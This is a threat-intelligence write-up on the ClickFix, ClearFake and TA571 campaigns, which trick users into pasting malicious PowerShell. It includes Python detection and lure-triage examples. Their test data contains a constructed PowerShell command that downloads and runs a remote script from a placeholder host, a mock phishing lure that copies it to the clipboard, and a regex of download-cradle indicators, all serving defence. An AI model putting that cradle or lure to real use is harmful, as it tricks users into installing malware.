Proofpoint has observed an increase in the use of a technique that relies on unusual social engineering: users are directed to copy and paste malicious PowerShell scripts themselves, infecting their own computers with malware. Threat actors including the initial access broker TA571 and at least one fake update activity set are using this method to deliver malware.
Whether the campaign begins with malspam or with a web browser inject, the technique is similar. Users are shown a popup text box suggesting that an error occurred while opening the document or webpage, together with instructions to copy and paste a malicious script into the PowerShell terminal or into the Windows Run dialog box, which in turn runs the script via PowerShell.
Proofpoint has observed this technique as early as 1 March 2024 by TA571, and in early April by the ClearFake cluster, as well as in early June by both clusters.
ClearFake
ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.
In observed campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance's Smart Chain contracts, a technique known as "EtherHiding". The initial script then loaded a second script from a domain that used Keitaro TDS for filtering. If this second script loaded and passed various checks, and if the victim continued to browse the website, they were presented with a fake warning overlay on the compromised website. This warning instructed them to install a "root certificate" to view the website correctly.
ClickFix
In mid-April 2024, researchers found compromised sites containing an inject leading to an iframe on pley[.]es. This iframe was shown as an overlay error message claiming that a faulty browser update needed to be fixed. Researchers dubbed this activity cluster ClickFix.
The error message asked the victim to open "Windows PowerShell (Admin)" (which opens a UAC prompt) and then right-click in the window to paste the code. If the victim did so, the pasted PowerShell fetched and ran a second, remote PowerShell script that downloaded and executed an executable, eventually leading to Vidar Stealer. However, just a few days after discovery the payload domain used in the PowerShell was taken offline, so although the error was still displayed on compromised websites it could no longer lead to an infection.
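Both chains end the same way: the user launches PowerShell from Explorer (the Run dialog or the Start menu) with a command that fetches a remote script and executes it. The Python below is an added detection example written for this edit, not code from the original post, that runs that logic over constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields and over constructed Run-dialog MRU values. Assumptions: explorer.exe is the parent of PowerShell started from the Run dialog or Start menu; the indicator list (download cradles, hidden window, encoded command) is a generic one and not taken from the page; the command lines and the `example.invalid` URL are made up.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# Security 4688 fields. None of this is real telemetry from the campaigns.
SAMPLE_EVENTS = [
    {   # benign: script run from a cmd.exe wrapper
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\ops\rotate-logs.ps1",
    },
    {   # pasted into the Run dialog: hidden window, remote script piped to iex
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/fix.ps1 | iex"',
    },
    {   # benign: PowerShell opened from the Start menu, no arguments
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    },
    {   # encoded-command variant (assumption: not described on the page)
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "pwsh -nop -ep bypass -enc aQBlAHgAIAAxAA==",
    },
]

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# values. Explorer stores each Run-dialog entry as "<command>\1".
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://example.invalid/fix.ps1 | iex"\\1',
    "MRUList": "ba",
}

# Generic download-cradle / evasion indicators (assumption: a general list,
# not indicators published on the page).
CRADLE = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer)\b"
    r"|-(?:e|ec|enc|encodedcommand)\s"
    r"|-w(?:indowstyle)?\s+hidden"
)


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def is_explorer_launch(parent: str) -> bool:
    # Assumption: Run dialog and Start-menu launches are children of explorer.exe.
    return parent.lower().rsplit("\\", 1)[-1] == "explorer.exe"


def indicators(command_line: str) -> list:
    """Matched cradle/evasion tokens, in the order they appear in the command line."""
    return [m.group(0).strip() for m in CRADLE.finditer(command_line)]


def classify(event: dict) -> list:
    """Indicators for PowerShell spawned by Explorer; empty list if the rule does not fire."""
    if not (is_powershell(event["Image"]) and is_explorer_launch(event["ParentImage"])):
        return []
    return indicators(event["CommandLine"])


def detect(events: list) -> list:
    """Events that fire, with the indicators that fired on each."""
    hits = []
    for e in events:
        ind = classify(e)
        if ind:
            hits.append({"CommandLine": e["CommandLine"], "indicators": ind})
    return hits


def runmru_suspicious(values: dict) -> list:
    """Run-dialog history entries that launch PowerShell with a cradle indicator."""
    out = []
    for name, val in values.items():
        if name == "MRUList":
            continue
        cmd = val[:-2] if val.endswith("\\1") else val  # drop Explorer's "\1" suffix
        if cmd.lower().startswith(("powershell", "pwsh")) and indicators(cmd):
            out.append(cmd)
    return out


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print("ALERT", h["indicators"], h["CommandLine"])
    for cmd in runmru_suspicious(SAMPLE_RUNMRU):
        print("RunMRU", cmd)
```

The parent-process condition is what separates this from ordinary scripted PowerShell: an administrator's scheduled task or cmd.exe wrapper does not pass it, while a command typed into the Run dialog does. The RunMRU check is useful on a host that has already been triaged, because the Run dialog keeps the pasted command even after the PowerShell process is gone.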
TA571
Proofpoint first observed TA571's use of this technique in a campaign on 1 March 2024. The campaign included over 100,000 messages and targeted thousands of organisations globally.
In this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word. The page also displayed an error message that said the “‘Word Online’ extension is not installed,” and presented two options to continue: “How to fix” and “Auto-fix”.
Proofpoint observed TA571 use similar attack chains in campaigns throughout the spring, using various visual lures and alternating between instructing the victim to open the PowerShell terminal and telling them to open the Run dialog box with the Windows key+R. The actor also removed wording that refers to copying and pasting, relying on the fact that the victim does not need to know that something has been copied to the clipboard.
In most of the campaigns, TA571 also padded the HTML files with various random content, creating semi-unique hashes for the attachments.
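The padding defeats attachment hashing, but it cannot touch the command handed to the clipboard, which has to stay intact for the lure to work. The following Python is an added triage example written for this edit, not Proofpoint's or TA571's code: it pulls the string passed to `navigator.clipboard.writeText` out of a lure (assumption: the lure uses that API, either with a literal or with a variable built from concatenated literals; the page does not say which JavaScript the actor used) and fingerprints the resulting command so that differently padded attachments cluster together. The two lures, their padding and the `example.invalid` URL are constructed for the example.

```python
import hashlib
import re
from typing import Optional

# Constructed lure skeleton, not a real TA571 attachment. {pad} stands for
# the random content that gives each copy a different file hash.
LURE_TEMPLATE = """<!DOCTYPE html>
<html><head><title>Document</title></head><body>
<!-- {pad} -->
<div class="error">'Word Online' extension is not installed.</div>
<button onclick="fix()">How to fix</button>
<button onclick="fix()">Auto-fix</button>
<script>
function fix() {{
{js}
}}
</script>
<div style="display:none">{pad}</div>
</body></html>
"""


def make_lure(pad: str, js: str) -> str:
    return LURE_TEMPLATE.format(pad=pad, js=js)


# Variant A: the command is a single literal passed straight to the clipboard API.
LURE_A = make_lure(
    "3f9a1c7e padding 2d40b8",
    '  navigator.clipboard.writeText("powershell -w hidden -c \\"iwr http://example.invalid/fix.ps1 | iex\\"");',
)
# Variant B: different padding, same command built by string concatenation.
LURE_B = make_lure(
    "b81e40c7 padding 9a3f1c",
    "  var c = 'powershell -w hidden ' + '-c \"iwr http://example.invalid/fix.ps1 | iex\"';\n"
    "  navigator.clipboard.writeText(c);",
)

# A JS string literal: a quote, then escaped chars or anything but that quote, then the quote.
JS_STRING = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1""")
WRITE_TEXT = re.compile(r"navigator\.clipboard\.writeText\(\s*([^)]*?)\s*\)")


def _concat_literals(expr: str) -> str:
    """Join every string literal in a `'a' + "b"` expression, resolving JS escapes."""
    return "".join(
        m.group(2).encode("utf-8").decode("unicode_escape") for m in JS_STRING.finditer(expr)
    )


def extract_clipboard_payload(html: str) -> Optional[str]:
    """Text the lure would place on the clipboard, or None if no writeText call is found."""
    call = WRITE_TEXT.search(html)
    if not call:
        return None
    arg = call.group(1)
    if JS_STRING.search(arg):
        return _concat_literals(arg)
    # Argument is an identifier: resolve its initializer
    # (assumption: declared with var/let/const in a single statement).
    decl = re.search(r"\b(?:var|let|const)\s+" + re.escape(arg) + r"\s*=\s*([^;]+);", html)
    return _concat_literals(decl.group(1)) if decl else None


def file_hash(html: str) -> str:
    """Plain SHA-256 of the attachment, which the padding is designed to vary."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def payload_fingerprint(cmd: str) -> str:
    """Hash of the whitespace-normalised, lower-cased command: stable across padding."""
    return hashlib.sha256(" ".join(cmd.split()).lower().encode("utf-8")).hexdigest()[:16]


if __name__ == "__main__":
    for name, lure in (("A", LURE_A), ("B", LURE_B)):
        cmd = extract_clipboard_payload(lure)
        print(name, file_hash(lure)[:16], payload_fingerprint(cmd), cmd)
```

Running it shows the two attachments with different file hashes but the same payload fingerprint, which is the key worth clustering and alerting on. A real lure may obfuscate the string further than simple concatenation, in which case the extractor needs to be extended rather than the fingerprint.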
Attribution
TA571 is a spam distributor that sends high-volume email campaigns to deliver and install a variety of malware for its cybercriminal customers, depending on the subsequent operator's objectives. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.
ClearFake is not currently attributed to a tracked threat actor.
While it’s clear that both actors are borrowing ideas from each other, Proofpoint does not associate them with each other in any other way.
Conclusion
This attack chain requires significant user interaction to be successful. The social engineering in the fake error messages is clever and purports to be an authoritative notification coming from the operating system. It also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk. The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains – including improving social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable malware delivery.
Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training programme.